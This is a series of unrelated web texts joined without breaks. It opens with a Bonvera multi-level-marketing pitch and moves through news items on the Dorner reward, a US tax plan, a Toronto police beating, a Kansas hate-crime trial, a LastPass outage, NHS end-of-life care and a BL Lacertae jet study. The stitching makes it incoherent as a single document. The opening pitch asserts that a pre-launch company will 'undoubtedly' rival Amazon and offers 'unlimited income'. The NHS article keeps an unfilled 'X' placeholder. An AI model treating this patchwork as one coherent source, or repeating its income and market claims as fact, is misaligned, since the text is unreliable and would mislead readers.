Everyone's heard the old adage, “ I've been poor and I've been rich and I like being rich better.” Well, being rich is a relative concept. Compared to third-world countries, even our homeless in America are rich. For my wife and I, serving at a high level involves way more than just having money, yet it's also hard to serve at that level being flat broke. Since there is no actual dollar amount to determine how to best serve it becomes necessary to seriously consider what it would financially take for you to achieve your specific goals? First you need a dream, secondly a plan and third, a way to reach that dream. Having those three elements in place would already put you in rarefied air because most people just fly by the seat of their pants. That will not work in today's world. Everyone needs a systemized game plan. I have come across a company in it's pre-launch phase that offers all three and will undoubtedly challenge Amazon in just a few years. Not only does it have a proven system and game plan, it offers a way to shop, eat and drink (the things everyone does) while saving time and money. It also has the option to be a business owner thereby making money from the comfort of your home. One of the best ways I know to help people on every level is to save them money and if they choose, help them make money. Right now Bonvera (an amazing nation-wide company) is offering a ground floor opportunity to develop a market share of a brand-new approach to business called The Compensated Marketplace. Having a way to achieve unlimited income gives one the freedom to produce the unlimited outcome most people want in their life. If having time and money to serve and help people as well as having extra income to have and do the things you've always wanted to sound good, I'd like to connect and share how that's achievable through being a Bonvera business owner. Unlimited income, which leads to unlimited outcome, can happen much quicker than you think.
See this post on Facebook and message me there for more information.
The city of Los Angeles offered a lot of money for information regarding the whereabouts of Christopher Dorner, but, after last night's shootout, the city may be off the hook for their $1 million reward. According to the legalese in the offer, there are a few big loopholes that the LAPD may be able to crawl through.
According to TMZ, there were three major awards offered for information about Dorner. The LA City Council and the LA County Board of Supervisors both offered a $100,000 reward, and the Mayor of Los Angeles offered a $1 million reward.
All of those offers may be void, however, since Dorner was killed during the shootout last night and not captured.
According to CBS, hundreds of tips poured in after Los Angeles put up a $1 million reward, and many believe that those tips directly led police to the cabin in Big Bear. The police may have used citizen information to find Dorner but that doesn't mean that they'll have to pay up.
You see, the Mayor of Los Angeles offered $1 million for the “capture and conviction” of Christopher Dorner, but the former officer was presumably killed in the cabin fire last night. And, if Dorner is dead, then it's going to be pretty hard to convict him. There's the loophole: No conviction equals no money.
The LA City Council and the LA County Board of Supervisors may also be able to slip through a similar Dorner reward loophole. The City Council offered money for the “the identification, apprehension, and conviction” of Dorner while the Board of Supervisors offered a reward for Dorner's capture.
But Dorner wasn't captured, and he certainly wasn't convicted.
The LAPD may have used citizen information to find Dorner, but, since they weren't able to take him alive, they probably won't have to pay a cent to anyone. That, of course, makes the cabin fire last night even more suspicious.
NY Mag reports that two maids are being credited with the tip that led police to Dorner. LAPD spokesperson Richard French said that the department is still talking about how (or if) they will hand out the reward.
French said:
“When there are rewards like this, they have to sit down with investigators and others, including the people who are offering the reward, the organizations who were offering the reward, and they have to kind of figure out how, or if, the reward is going to be distributed.”
Do you think the city of Los Angeles should pay out the reward money?
Cashin: Concern over whether they can get tax plan through 2:03 PM ET Wed, 27 Sept 2017 | 02:33
Breaks for companies outlined in the new Republican-backed tax reform plan are expected to be unambiguously positive for Wall Street but may not be so popular on Main Street.
The plan, released Wednesday morning, calls for lowering the U.S. corporate tax rate from its current 35 percent to 20 percent. Other provisions allow companies to immediately deduct depreciation and to bring profits back from overseas at a reduced rate.
Experts assessed the proposals as ones that both corporate America and investors will appreciate.
"The market should like that there's such a focus on business tax cuts," said Greg Valliere, chief global strategist at Horizon Investments. "There are a lot of things they can't afford. I'd describe it as a wish list more than anything else."
It wasn't what everyone was wishing for, however.
Just 24 percent of Americans surveyed in a Pew Research poll released Wednesday say taxes on corporations and big businesses should be lowered. More than double that — 52 percent — believe they should be raised. Some 21 percent believe the rate should stay where it is.
Views on corporate taxes split along party lines — 69 percent of Democrats and independents leaning the party's way want corporate taxes raised, while the GOP side has 41 percent saying those rates should be lowered.
A Toronto-area man is seeking $5 million in damages from police after being beaten during a mistaken arrest that was caught on camera.
Santokh Bola, 21, of Woodbridge, Ont. was arrested after getting out of his vehicle in an Islington Avenue parking lot near his grandfather's store, India Bazaar, around 8 a.m. on Nov. 1.
Santokh Bola's legal team said the 21-year-old suffered this black eye following a wrongful arrest by Toronto police officers. (Submitted) Bola's lawyers, speaking at a Wednesday news conference, said he was released moments after being taken into a police cruiser. Later, his family took him to hospital where he was treated for head injuries. His lawyer says he's also suffering from emotional trauma.
Bola's family has lodged a formal complaint with the Toronto Police Service. They've also filed a statement of claim at the Superior Court of Justice against the officers involved in the arrest as well as Toronto police Chief Mark Saunders and the Toronto Police Services Board.
"These people need to be held accountable," said Sonia Bola, who spoke to reporters on her brother's behalf as he has developmental disabilities.
Toronto police spokesman Mark Pugash said the Office of the Independent Police Review Director (OIPRD) has opened an investigation into the matter and police will cooperate fully
'Video doesn't tell the whole story'
But, Pugash cautioned, the "video doesn't tell the whole story," about the incident and that the OIPRD will have to decide if the officers used an appropriate level of force given the information they had at the time.
Toronto police union president Mike McCormack agreed with Pugash.
He told CBC News the force feels it's "being judged by a snippet of a video when there's a much longer, broader story about what commands our police officers were responding to.
"What kind of commands did they give this individual?," McCormack asked. "Did the individual comply with those commands? And why did they have to use physical force which may be justified."
He added that the officers are very stressed about the situation.
"It's difficult when they're doing their jobs and being judged on this video and there's a bigger story," McCormack said.
Pugash said officers were called to the area after someone called 911 about a man with a knife, a call police treat as an "urgent and dangerous" situation. Officers felt it was necessary to immediately arrest Bola, who Pugash said fit the description provided to police.
Pugash also suggested Bola was resisting arrest, saying "very few people want to be arrested ... people resist. It can get messy."
None of the claims has been proven in court.
Video shows Bola pleading with officers
A bystander's video — which lasts nearly three minutes long and is shot from a nearby window — doesn't show the moments leading up to the arrest. In the video, officers approach Bola with their guns unholstered, while Bola yells "I didn't do anything, sir" as the arrest begins.
Santokh Bola, right, sits alongside his father, Sukminder Bola, at a Wednesday news conference. (Chris Young/The Canadian Press) Bola's family said police told them they had been investigating a burglary in the area.
The officer appears to kick the suspect three times, getting him on the ground. From there, the same officer punches the man in the head 12 times in rapid succession.
"F—k you," Bola yells at one point, amid screams of apparent pain.
A second officer, who arrives at the scene moments after the video begins recording, assists with the arrest.
"I didn't do anything! I didn't do anything!" Bola yells while pinned to the ground.
The first officer, with his hand on the back of the Bola's neck, then throws three more punches into the side of the man's head.
Santokh Bola was punched in the head at least 15 times during the arrest. (Submitted) "Let me go, please," Bola yells.
"You're under arrest. Let's go, now," one of the officers can be heard telling Bola as he begs the officers to speak with his family.
The officers continue to hold him down while appearing to put handcuffs on. Two more officers arrive on the scene moments later.
"Sir, I beg you. I beg you. I beg you," the man says as his face appears to be pushed down into the pavement.
With the man cuffed, the police appear to search the man while he's on the ground.
Just before the video ends, Bola appears to jut his leg toward one of the officers and is kneed in the stomach.
Family wants answers: lawyer
Michael Smitiuch, one of Bola's lawyers, said his client had done nothing wrong in the moments leading up to his arrest.
This is not a fight against police, it's about holding the officers involved accountable. - Michael Smitiuch , lawyer representing Bola family
During the arrest, Smitiuch said, Bola's behavior was completely appropriate.
"This is not a fight against police, it's about holding the officers involved accountable," Smitiuch said.
"The family deserves answers."
Ken Byers, co-counsel for the case, said the force used was "obviously excessive" and said the officers involved should have stopped for a second to speak with Bola, who wasn't armed and wasn't trying to flee.
"Effective police relies upon respect and trust," Byers said.
"Incidents like this erode that public faith."
Sonia Bola said the family met with officials at 23 Division, who said they believed proper protocols were followed and offered no apology for what took place.
Ontario's Special Investigations Unit, which looks into cases involving serious injury, death or sexual assault involving the police, hasn't been involved in this case.
Pugash said the SIU wasn't called in because the injuries sustained by Bola didn't meet the organization's threshold.
Bola himself, meanwhile, has been "traumatized" by the event and still flinches anytime he sees a police officer or cruiser, his sister said.
A white supremacist charged with killing three people outside two Jewish centers in Kansas last year asked a jury on Friday to find him not guilty because he was acting on the belief that Jews have too much power and must be stopped.
Follow Ynetnews on Facebook and Twitter
Frazier Glenn Cross, 74, a former senior member of the Ku Klux Klan who is representing himself at trial, could be sentenced to death if convicted in the April 2014 shootings in Overland Park, Kansas, a suburb of Kansas City.
He also is charged with the attempted murder of three others. Cross has pleaded not guilty to all the charges.
Cross admitted to jurors on Friday that he killed a man, woman and teenage boy and tried to kill more people during a shooting spree on the eve of the Jewish Passover holiday. None of the victims were Jewish but Cross he did not know that at the time.
Frazier Glenn Miller on trail (Photo: Reuters)
He said he believes Jews have committed genocide against white people, and control both the media and Wall Street to the detriment of white Americans.
"I had no criminal intent, I had a patriotic intent to stop genocide against my people," said Cross, who is also known as Glenn Miller.
Seated on the witness stand, Cross described himself as a husband and father who owned a farm in southwest Missouri. He said in the days before committing the murders he researched what he sees as the demise of the white race and decided he had to take action
Frazier Glenn Miller on trail (Photo: Reuters)
"I hate Jews," Cross said. "They are the ones who destroy us."
If convicted, the second phase of the trial next week will determine if he should be executed.
Johnson County District Judge Thomas Kelly Ryan denied an effort by Cross to show videos that reflect his political and religious views, but said he may do so if there is a penalty phase.
Cross is charged with killing high school student Reat Underwood, 14, and Underwood's grandfather, 69-year-old William Corporon, outside the Jewish Community Center of Greater Kansas City, as well as Terri LaManno, 53, outside a nearby Jewish retirement home.
Prosecutors in Kansas rested their case on Thursday after playing a recorded call from his jail cell in which Cross expressed surprise that his victims were not Jewish.
Updated Popular password management service LastPass went on the blink today, leaving users locked out of their accounts.
Reg reader Tim Stephenson, head of IT at Liftshare, told us that the firm's employees had experienced timeouts trying to access the site, browser plugins weren't responding and users couldn't authenticate themselves or access their credentials.
“We started using LP for secure password management about a year back and have a number of systems that accept LP Single Sign On for convenience. Very, very annoying and currently LP seems to be saying nothing whatsoever to their users. Disappointing as a paid-for enterprise customer,” he said in an email.
Customers also took to Twitter to complain about the service, with some claiming that the password-memory-bank had been down and out for over four hours.
@LastPass Since this morning I can't login.. 4 hours and still no response from your helpdesk. Premium member here. Can somebody care plz? — Panagiotis Kefalidis (@pkefal) August 12, 2014
LastPass seemed to be ignoring repeated tweets about the problems earlier this morning, but finally issued a message on Twitter around 2.12pm BST, two hours after Stephenson first contacted El Reg.
We're working as quickly as possible to resolve connection errors affecting a small percentage of users, we apologize for the inconvenience. — LastPass Support (@LastPassHelp) August 12, 2014
Unhelpfully, both the LastPass support pages and status page online also appear to be down, leaving folks with very few ways to contact the company. ®
Update
since the publication of this story, LastPass has been in touch to tell The Reg that the problems had been caused by one of its data centres going down at 8.57am BST this morning.
“We immediately started taking action to migrate the service to run entirely on a different data centre - in the meantime, a percentage of our user base did experience connection errors with the LastPass service,” spokesperson Amber Gott said in an email. “We have been engaged with our provider the entire time and have been working with them to resolve the issues. We have done everything we can to minimise impact and are working to get the redundant data centre up as soon as possible.”
A day after the arrest of Dera chief Gurmeet Ram Rahim Singh's 'adopted' daughter Honeypreet Insan, the United Nations' entity for water and sanitation has invited the two to lend their support on World Toilet Day.
The tweets were later deleted. It is unknown whether the invitation, which came from a verified UN Twitter account, is valid or was mistakenly sent by the organisation. There is also a possibility of the tweets being auto-generated, since both the guests are currently convicted.
The invitation threw Twitterati into a tizzy. While Congress' Priyanka Chaturvedi‏ wondered if it was the Haryana government behind the handling of UN entity's account, several Twitter users tweeted hoping that the invite were a joke.
Is Haryana government handling your account @UN_Water ?? #JustAsking — Priyanka Chaturvedi (@priyankac19) October 4, 2017
After giving interviews to multiple media houses and expressing her desire to surrender and on Tuesday, Honeypreet was taken into custody by Haryana Police.
On 28 August, the Dera chief was sentenced to 20 years in prison for the rape and sexual exploitation of two female disciples.
Honeypreet, who is to be produced before Punjab and Haryana High Court on Wednesday, had been evading arrest ever since Ram Rahim was convicted on 25 August. She has been Ram Rahim's closest aide since 2009.
In a bid to track her, the police had conducted raids in Nepal, Rajasthan, Bihar, Delhi, and Haryana. She had also topped the list of most wanted persons in relation to the wide-spread violence in Panchkula after Ram Rahim's conviction. Several vehicles and public property were damaged or torched by the mob.
Before Tuesday's arrest, Honeypreet had dismissed claims that she had any role in instigating the riots. She had also rejected that she denied having illicit relations with Ram Rahim, in contradiction to what was alleged by her former husband Vishwas Gupta.
Gupta had married Honeypreet, then known as Priyanka Taneja, in 1999 on the direction of the Dera head before filing for divorce in 2011.
With inputs from agencies
Firstpost is now on WhatsApp. For the latest analysis, commentary and news updates, sign up for our WhatsApp services. Just go to Firstpost.com/Whatsapp and hit the Subscribe button.
Young US boy receives surprise thank you gift after donating to vandalised mosque
Updated
When seven-year-old Texas boy Jack Swanson donated his savings to assist in the clean-up of a local mosque that had been vandalised, he did not expect anything in return.
But he has now received a generous gift of thanks from the American Muslim Community.
Following his $US20 donation — which he had earned helping out at home, and was saving for an Apple iPad — Jack received a surprise iPad in the post and a letter reading:
"Dear Jack, you had saved $20 in your piggybank for an Apple iPad. But then a local Islamic mosque was vandalised. So you donated your $20 to this local Texas mosque because of your amazing generosity and kind heart. Please enjoy this Apple iPad with our sincere thanks. Love the American Muslim Community."
The editor of the Islamic Monthly Magazine, Araslan Iftikar — who put out a call on Facebook looking for Jack's parents and has since posted about him receiving the gift — appears to be behind the present, the Telegraph reported.
Earlier this week, the Islamic Centre of Pflugerville (ICP) was found defaced with smeared faeces and torn pages from the Quran, an incident police are treating as a hate crime, local television station KXAN reported.
Jack's mother Laura Swanson said Jack was upset when he heard about what had happened, and after talking to his mother decided to donate his savings to help with the clean up costs.
"We were talking in the car how someone smeared poop on their church and that was a really, really awful thing to do," Ms Swanson told KXAN.
"We had a good conversation about what churches are for and how everybody's churches are important.
"It's disgusting, it's gross, it doesn't matter what you believe, what I believe, what he believes or anybody believes, all faith is important."
ICP board member Faisal Naeem said Jack's donation gave him hope.
"It's 20 bucks but coming from Jack collecting his pennies, it's worth 20 millions bucks to me and to our community," he told KXAN.
"This gives me hope because this means it's not one versus the other."
Topics: religion-and-beliefs, community-and-society, children, united-states
First posted
In 2014, there are a lot of cool things. One of those, is not batteries. In fact, they're downright ancient by comparison to the explosion of mobile tech. To put it another way, there really hasn't been any new tech in batteries in years, although Qi 1.2 with its resonance charging is a nice step forward.
Nokia has posted a video today, slightly humorous, highlighting the issue. Shot entirely on a Lumia 1020, the video demonstrates how Nokia is working on various technologies to help charge your phone when you're not near an outlet. The main one featured is a system using kinetic energy that transfers into electricity to charge a battery. It's a neat idea, but as noted at the end, it still takes some time to charge.
The fate of Flickr has long been in question since Yahoo! decided to sunset Delicious many months ago. For the past several years, the site, which was founded in 2004, has remained stagnant, unchanged with the exception of thousands of new members and a few social features.
The site looks dated, there is a growing amount of MySpace-ish spam, showcasing large photos is awkward, the iPhone app is slow (there is no iPad app) and activity on Flickr feels a little “walled” off from the rest of the web. –Fernando Gros, Photographer
Dozens of competitive companies have popped up but none have had held much clout. Photography, being a visual art, attracts those with an eye for beauty, so its unsurprising that all the cool kids are moving their best work over to 500px because of its simple portfolio building tools and easy-to-navigate user interface.
500px vs. Flickr
In the past few months, what I would consider a large number of photographers, have made their way to the Toronto-based 500px.com through word of mouth through the Twitterverse and Facebook. While the site doesn't necessarily have the same features and functionality that Flickr has, the site does one thing extremely well: Display photographs. They also provide a portfolio site for members, with more options for paying subscribers. Many of the portfolio templates are very clean-looking and they all seem to load pretty fast. For those of us who are selling most of our work to art directors & photo editors, this is a good thing…In my opinion, we're in the early stages of seeing 500px.com take a nice tasty bite out of Flickr's market. –Ben Chase, Photographer
If you are a professional artist, which home page would you prefer?
vs.
It's a pretty obvious choice for most: 500px, a Tortonto-based startup was launched in October 2009 by founders and photographers Oleg Gutsol and Ian Sobolev with the idea to gather the best photographs in one place. In June 2011, the site received $525,000 in Series A funding with with investment from High Line Venture Capital, Deep Creek Capital and ff Venture Capital. The site lets photographers create contemporary portfolios with optional themes that are separate from the photostream. Portfolio also has sections for Biography and Contact. In fact, this makes it a great ready made website solution for photographers who are web challenged.
500px is less of a storage unit like Flickr and more of an artist's collective. In a May interview with Gigaom, Gutsol, one of the site's two co-founders said: “We see Flickr more as a photo storage site, where anyone can upload all their photos in one place and share them with their friends. We're interested in getting the best photography in the world in one place, and growing the best photography community.”
Social: On Flickr, you can add a contact, friend or family and those relationships can either be asynchronous or mutual. In the same way and similar to Twitter, you “Follow” other photographers on 500px, as well as favorite and save their images. But unlike Flickr, within minutes of uploading your images, you can expect feedback from the 500px community, complete with a “like” based voting system. The social engagement on 500px blows Flickr out of the water. Maintain a blog, write on a friend's wall, view their activity newsfeed style and even view their friend's photos all on 500px.
Explore: Photos can be viewed from the home page by Popular, Editor's Choice, Favorites, Upcoming, Fresh and Blogs. You can even select to include nude photos in your search unlike the prudes at Flickr.
In comparison, have you ever seen photos this beautiful using Flickr's Explore feature? It looks like this:
Licensing & Sales: Most images on Flickr fall under Creative Commons, so the site is a free for all to spread beautiful images around the world without paying attention to copyright. Meanwhile, at 500px most photos are allowed to be shared for personal use, but are restricted from use on printed materials, online materials, books, cds, dvds, editorial materials, etc. So if you are a professional photographer who needs to earn money from his or her photos and doesn't appreciate them being downloaded by bloggers like me, 500px definitely has its advantages. 500px also allows its users to sell their photos on the site, and 500px collects a 5% commission on all printing sales.
Costs: A premium account with unlimited uploading will set you back $50 per year vs. Flickr's $25 per year. But with the paid version on 500px you can link your photostream to a custom domain, an RSS feed, have the ability to remove all 500px branding from your stream (aka white label), it's advertising free, and you'll have the ability to hook your stream up to a Google Analytics account to better monitor traffic and activity.
500px does have a few cons: 500px lays down the rules, and I don't really like rules, so here they are:
Choose only your very best photos Photos must belong to you
Maximum filesize is 30 MB, larger files will not be added to the queue
JPG file type only Your limit is 20 / 20 photos in a week.
Upload up to 10 Photos at a time
After the upload is done — add title, description, and tags to your photos, select a category and click save.
Uploading is manual, and slow because it's all done through the web page. 500px says, “Please be patient — we are scaling your files and uploading them to the cloud. This takes some time, especially if your original files are large (because we store them too).”
What it still needs: A mobile app. A public API. Geolocation integration. And a way to declare photos are under a Creative Commons license if you do want to share your photos with bloggers like me. Photographer Ben Chase points out that 500px needs a Lightroom plugin to make it easy to upload to the site right from Lightroom including the ability to track and update photos from within the app.
In conclusion, 500px is not going to replace Flickr for the masses. When it comes to storing your memories in the cloud, Flickr's ease of uploading, its legacy brand and its cheap price are going to keep amateur picture takers like me happy. But 500px is hot and will pave the way of online communities for professional photographers. The attraction and hype surrounding 500px should light a fire under Flickr to become more engaged with its community, up its game in terms of features and particularly its tired user interface.
In related news, learn how to turn Google+ into an online photography portfolio here.
Read next: Microsoft Surface SDK 2.0 due July 12
The study suggests that in total, around 57,000 patients a year are dying in NHS hospitals without being told that efforts to keep them alive have been stopped.
It also reveals that thousands of dying patients have been left to suffer in pain, with no attempt to keep them comfortable while drugs were administered.
Jeremy Hunt, the Health Secretary, last night described the disclosures from records held by 178 NHS hospitals as "totally unacceptable".
He said the failure to consult patients would now be examined by an independent inquiry, which will also look at payments made to hospitals for meeting targets to place people on the pathway.
Each year around 130,000 patients are placed on the pathway. The national audit by the Marie Curie Palliative Care Institute Liverpool and the Royal College of Physicians examined a representative sample of 7,058 deaths which occurred between April and June last year, at 178 NHS hospitals. Of these, X were on the pathway.
The new disclosures demonstrate just how routinely hospitals are placing patients on the pathway without informing them that steps which could hasten their death have been taken. The national audit found:
• In 44 per cent of cases when conscious patients were placed on the pathway, there was no record that the decision had been discussed with them.
• For 22 per cent of patients on the pathway, there was no evidence that comfort and safety had been maintained while medication was administered.
• One in three families of the dying never received a leaflet they should have been given to explain the process.
Critics of the pathway - which can involve the withdrawal of drugs, fluids and food, and the administration of powerful pain relief - say it is being used to hasten the deaths of the terminally-ill and elderly, in a form of "back-door euthanasia".
Other doctors, nurses and charities for the dying have come to the defence of the approach, which they say is intended to help ensure that people can die in dignity and comfort, instead of enduring invasive and painful treatment.
In recent months, there has been mounting concern over cases in which family members said they were not consulted or even told when food and fluids were withheld from their loved ones.
Earlier this month, Mr Hunt pledged to strengthen laws to protect patients, making it illegal to put anyone on the pathway - which leads to death in an average of 29 hours - without consulting them or their families.
It comes as the Government prepares to launch a new "vision for nursing" this week which will attempt to instill compassion in the profession, amid deepening concerns about the quality of care being provided on hospital wards.
Last night Mr Hunt said the evidence would be examined as part of an independent review of the practice, which will report back to him in the New Year.
He told The Sunday Telegraph: "It is totally unacceptable for people to be put on the pathway without consent where they are able to give it - that is why we are looking at what goes on in practice to make sure this doesn't happen."
Mr Hunt said he was concerned that families and patients were not being sufficiently informed, but suggested the approach to end-of-life care had been mischaracterised by some of its critics.
"We need to be much better at ensuring we are giving people dignity in their final few hours and the Liverpool Care Pathway has played a really important role in improving the standard of care in hospital, to hospice level," he said.
Earlier this month, the Department of Health began a three-month consultation on changes to the NHS constitution, which would give patients and their families a legal right to be consulted on all decisions about end-of-life care.
The rights will mean patients and relatives could sue if the requirements are not met, and doctors could be struck off if they fail to consult properly.
In a hard-hitting speech last week Mr Hunt expressed concern about the culture of the NHS, warning that too many patients were forced to experience "coldness, resentment, indifference" and "even contempt".
He warned that in the worst institutions a "normalisation of cruelty" had been fostered.
The family of Arthur Oszek, 86, say they did not find out he had been put on the Liverpool Care Pathway last year until he was left begging for a drink, having been taken off his drip.
After almost a day of discussion with medical staff, treatment was resumed, but it was too late, and Mr Oszek died within 24 hours last August.
Ann Murdoch, Mr Oszek's stepdaughter, said: "We asked the doctors why he was taken off his drip and we were told he was on the Liverpool Care Pathway. We did not even know what it was."
"There is no way that should have happened without asking us. We kicked up a fuss and demanded he be put back on his medication and eventually they agreed about 20 hours later."
NHS Ayrshire and Arran said they could not comment on individual cases, but discussed their assessments with patients and families wherever possible. On other occasions, patients placed on the pathway because doctors judged that they were nearing the end of their life went on to recover.
Patricia Greenwood, 82, was put on the pathway in August, after being admitted to Blackpool Victoria Hospital with heart problems, and then suffering a fall.
Doctors told her family that they had taken her off feeding tubes because she was not expected to last more than a couple of days.
After her son, Terry, 57, defied the hospital's orders and gave her sips of water through a straw, Mrs Greenwood, a former pub landlady, rallied, and doctors agreed to put her back on a drip.
She is now back at home and has made plans for a world cruise. The hospital trust said it had not received a complaint about her care.
A survey of 22,000 recently-bereaved Britons found relatives of those cared for in hospices rated the care far better than those whose loved ones spent their last months of life in hospital.
Less than half of families felt hospital nurses had always treated their relative with respect, compared with 80 per cent of those whose loved ones were treated in hospices.
One in six respondents said decisions were made about care which the patient would not have wanted.
Overall, health services in London were rated worst for quality of care, featuring most regularly in the bottom 20 per cent, as rated by the bereaved, while those in the South West scored most highly.
The Inner Jet of an Active Galactic Nucleus as Revealed by a Radio-to-Gamma-ray Outburst: The Quasar-like Object BL Lacertae
Source: Cosmovision, a group led by Dr. Wolfgang Steffen of the Instituto de Astronomia, UNAM, Ensenada, Mexico
Above: Still frame (high resolution) from animation that illustrates the discovery discussed in our paper " The Inner Jet of an Active Galactic Nucleus as Revealed by a Radio-to-Gamma-ray Outburst " in the journal Nature (Marscher, A.P., et al., 2008, vol. 453, 24 April 2008 issue). See the description below. (It is possible to rotate the image, since there is no up-down or left-right in space. In fact, in BL Lac, the jet points to the south as we see it.) You can skip down to where you can click to download the movie. The movie, which is a conceptual interpretation of the data, was made by Cosmovision, a group led by Dr. Wolfgang Steffen of the Instituto de Astronomia, UNAM, Ensenada, Mexico (see below). The animation features a bright "knot" that moves through the jet away from the black hole. An outburst of visible light, X-rays, and gamma-rays is seen as the knot reaches maximum speed at the edge of the region with coiled magnetic field (twisted light-blue lines). A second outburst occurs when the knot passes through and is compressed by a stationary shock wave (the "X" shaped feature).
Caption: Illustration of a shock wave (bright "blob" in the upper jet) following a
spiral path (in yellow) as it moves away from the black hole and through a section of
the jet where the magnetic field (light blue curved lines) is wound up in a coil. This caused the
first brightening seen in visible, X-ray, and gamma-ray light; later, the
shock passed through the stationary X-shaped compression in the jet and
brightened a second time. shaped
Note: All images, movies, and figures presented here are copyrighted. However, publication or exhibition in the news media as well as public or private viewing for educational purposes is fair use and does not require permission. Any publication of the images or movies in a scientific paper, book, or textbook requires written permission by the authors, which they will generally grant if the source of the material is indicated in the publication. The PDF file of the Nature paper is copyrighted by Nature Publishing Group and only available through Nature until 24 November 2008, after which it will be posted here. Requests for permission to use the material in the paper should be sent to permissions@nature.com. Send other permission requests to Prof. Alan Marscher, who will refer you to the appropriate copyright holder. The work described here was funded in part by NASA and the National Science Foundation; however, the processing of the data and interpretation are the responsibility of the authors and do not necessarily represent the views of either agency.
Here is a description of our findings . This is an expanded version (and with a different title) of a press release written by David Finley of the National Radio Astronomy Observatory
BURSTS OF RADIATION REVEAL HOW BLACK HOLES MAKE JETS
At the cores of many galaxies, supermassive black holes, millions of times more massive than the Sun, propel powerful jets of charged particles outward at nearly the speed of light. Just how they perform that feat has long been one of the great mysteries of astrophysics. The leading theory says that the particles are accelerated by tightly-twisted magnetic fields close to the black hole, but confirming that idea required an elusive close-up view of the jet's inner throat. Now, using the National Science Foundation's Very Long Baseline Array (VLBA) radio telescope, along with NASA's Rossi X-ray Timing Exporer and a number of telescopes observing at visible wavelengths, astronomers have watched material winding a corkscrew outward path and behaving exactly as predicted by the theory.
"We have gotten the clearest look yet at the innermost portion of the jet, where the stream of particles is actually accelerated, and everything we see supports the idea that twisted, coiled magnetic fields are propelling the material outward," said Alan Marscher of Boston University, leader of an international research team. "This is a major advance in our understanding of a remarkable process that occurs throughout the Universe," he added.
Marscher's team includes Boston University senior research associate Svetlana Jorstad, graduate student Francesca D'Arcangelo, and undergraduate students Haruki Oh and Alice Olmstead, as well as researchers from the University of Arizona's Steward and Multiple Mirror observatories, the University of Michigan, Georgia State University, St. Petersburg State University in Russia (with a telescope at the Crimean Astrophysical Observatory), the University of Southampton and Cardiff University in the UK, Metsahovi Radio Observatory of the Helsinki University of Technology (TKK), and University of Turku in Finland, Perugia University Observatory in Italy, and Abastumani Astrophysical Observatory in the Republic of Georgia.
The astronomers studied a galaxy called BL Lacertae (BL Lac), located about 950 million light-years from Earth. BL Lac is a blazar, the most energetic type of black-hole-powered galactic core. A black hole is a concentration of mass so dense that not even light can escape its gravitational pull. Supermassive black holes - about 200 million times the mass of our Sun in the case of BL Lac - in these galaxies' cores power jets of electrically charged particles and intense radiation.
Material pulled inward toward the black hole forms a flattened, rotating disk, called an accretion disk. As the material moves from the outer edge of the disk inward, magnetic field lines perpendicular to the disk are twisted, forming a tightly-coiled bundle that, astronomers believe, propels and confines the ejected particles. Closer to the black hole, space itself, including the magnetic fields, is twisted by the strong gravitational pull and rotation of the black hole.
Theorists predicted that material moving outward in this close-in acceleration region would follow a corkscrew-shaped path inside the bundle of twisted magnetic fields. They also predicted that light and other radiation emitted by the moving material would brighten when its rotating path was aimed most directly toward Earth. Marscher and his colleagues anticipated that there might also be a flare later when the material hits a stationary shock wave called the "core" some time after it has emerged from the acceleration region. "That behavior is exactly what we saw," Marscher said, when his team followed an outburst of radiation from BL Lac. In late 2005 and early 2006, the astronomers watched BL Lac with an international collection of ground- and space-based telescopes as a bright knot of condensed material was ejected outward through the jet. As the material sped out from the neighborhood of the black hole, the VLBA could pinpoint its location, while other telescopes measured the properties of the radiation emitted from the knot.
Bright bursts of light, X rays, and gamma rays came when the knot was precisely at locations where the theories said such bursts would be seen. In addition, the property of the radio and light waves called polarization rotated as the knot wound its corkscrew path inside the tight throat of twisted magnetic fields.
"We got an unprecedented view of the inner portion of one of these jets and gained information that's very important to understanding how these tremendous particle accelerators work," Marscher said.
The National Radio Astronomy Observatory is a facility of the National Science Foundation, operated under cooperative agreement
by Associated Universities, Inc. The US-based portion of the research was funded by NASA and the National Science Foundation.
__________________________________________________________________________________________
MOVIE!! that you can download in any of 3 formats. The movie illustrates what we think is going on near the center of BL Lac. This is an animation (not from real data) created by Cosmovision*.
360 sq. pixels best for computer screens)
ntsc version (for US television, video codec: DVC-PRO)
pal version (for European television)
Description of the movie: The supermassive black hole (with a mass of about 200 millions times that of the Sun, which corresponds to an event horizon that is about twice as large as the size of the Earth's orbit around the Sun) is just a very tiny black dot at the center. Surrounding it is an accretion disk of gas and dust from interstellar space that is slowly falling into the black hole while rotating around it in nearly circular orbits. (Despite the black hole's strong gravity, the gas has too much inertia because of the rotation of the disk to fall directly into the black hole. Instead, it swirls around until a process similar to friction slows it enough to fall past the event horizon.) The accretion disk contains a magnetic field that is twisted by the rotation (which is faster closer to the black hole). A coiled magnetic field creates a pinching force that focuses the plasma (charged particles that move together) into a narrow jet as it flows away from the black hole. (The magnetic field itself is probably kept from expanding excessively by pressure from a wind that we think surrounds the jet.)
We think that outbursts of radiation from blazars are triggered near the black hole, where some explosive event (such as "reconnection" of magnetic field in places where oppositely directed magnetic fields come in contact) shoots extra energy down the jet. This probably forms a shock wave that moves down the jet along a spiral path. The jet flow velocity increases with distance from the black hole, driven by magnetic forces. As the speed approaches the speed of light, the radiation is beamed more and more in the forward direction, similar to focusing a halogen flashlight. Since the jet points almost in our direction, the radiation from the shock wave gets most intense when the velocity reaches its maximum value, 0.98 times the speed of light. This actually creates an illusion that the bright knot of material made by the shock is moving 5 times faster than light travels. A few weeks later, after the emission has faded as the material in the shock expands and cools, we see a second brightening when the material is compressed by a stationary shock wave created by a pressure difference between the jet and the gas of the surrounding galaxy.
The crucial aspect is what happened during the first flare. The polarization - which indicates the direction of the magnetic field - made about 1.5 rotations. So, that means that the blob passed through a coiled magnetic field. (In order to break the symmetry so that the polarization from different parts of the coil don't cancel, the blob needs to cover less than 100% of the width of the jet and it needs to follow a loose spiral path.) We surmise that the reason for the rise in brightness is the acceleration of the blob as it passes through the region of coiled magnetic field. All of this is exactly what was predicted by theorists, especially Nektarios Vlahakis (U. Athens, Greece) and Arieh Konigl (U. Chicago). But previous observations did not have frequent enough VLBA imaging combined with polarization observations and closely spaced measurements of the radio, visible, and X-ray brightness to fill in enough pieces of the puzzle to determine what is happening physically in the jets.
We hope that we can get an even better look at the jet - maybe see even closer to the black hole - when NASA's GLAST satellite observatory is launched in May, providing us with data showing how the brightness of gamma-rays changes with time. And in 2012, a Japanese radio antenna, VSOP-2, is scheduled for launch into a large Earth orbit. This will allow better resolution of the radio images so that we can see finer detail than is currently possible.
